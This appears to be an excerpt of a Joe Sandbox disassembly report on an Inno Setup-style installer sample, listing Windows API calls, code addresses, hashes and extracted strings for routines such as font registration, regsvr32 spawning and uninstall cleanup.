                                                                                            • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                            • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                            • SaveDC.GDI32(?), ref: 00416E27
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                            • DeleteObject.GDI32(?), ref: 00416F22
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                            • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                            • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                            • String ID:
                                                                                            • API String ID: 3985193851-0
                                                                                            • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                            • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                            • SendNotifyMessageA.USER32(0002043C,00000496,00002710,00000000), ref: 00481A97
                                                                                            Strings
                                                                                            • DeinitializeSetup, xrefs: 0048190D
                                                                                            • Restarting Windows., xrefs: 00481A72
                                                                                            • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                            • Deinitializing Setup., xrefs: 00481872
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                            • API String ID: 3817813901-1884538726
                                                                                            • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                            • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
APIs
• SHGetMalloc.SHELL32(?), ref: 004616C7
• GetActiveWindow.USER32 ref: 0046172B
• CoInitialize.OLE32(00000000), ref: 0046173F
• SHBrowseForFolder.SHELL32(?), ref: 00461756
• CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
• SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
• SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
• String ID: A
• API String ID: 2684663990-3554254475
• Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
• Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
• Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
• Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
• Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
• Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
• Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
• Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
• GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
• GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
• Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A9B9
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
• SetBkColor.GDI32(?,?), ref: 0041AA08
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
• SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
• SetBkColor.GDI32(00000000,?), ref: 0041AAC3
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
• Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
APIs
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
• Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
• GetSysColor.USER32(00000014), ref: 0044D1B0
• SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
• GetSysColor.USER32(00000010), ref: 0044D202
• SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
• Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
• Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
• Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
APIs
• GetFocus.USER32 ref: 0041B745
• GetDC.USER32(?), ref: 0041B751
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
• RealizePalette.GDI32(00000000), ref: 0041B792
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Palette$Select$BitmapCreateFocusRealize
• String ID: %H
• API String ID: 3275473261-1959103961
• Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
• Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
APIs
• GetFocus.USER32 ref: 0041BA17
• GetDC.USER32(?), ref: 0041BA23
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
• RealizePalette.GDI32(00000000), ref: 0041BA69
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Palette$Select$BitmapCreateFocusRealize
• String ID: %H
• API String ID: 3275473261-1959103961
• Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
• Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
• Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
• Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                            Strings
                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                            Similarity
                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                            • String ID: Deleting Uninstall data files.
                                                                                            • API String ID: 1570157960-2568741658
                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                            Strings
                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                            Similarity
                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                            • API String ID: 955540645-649663873
                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                            APIs
                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                            • String ID: Explorer
                                                                                            • API String ID: 2594429197-512347832
                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
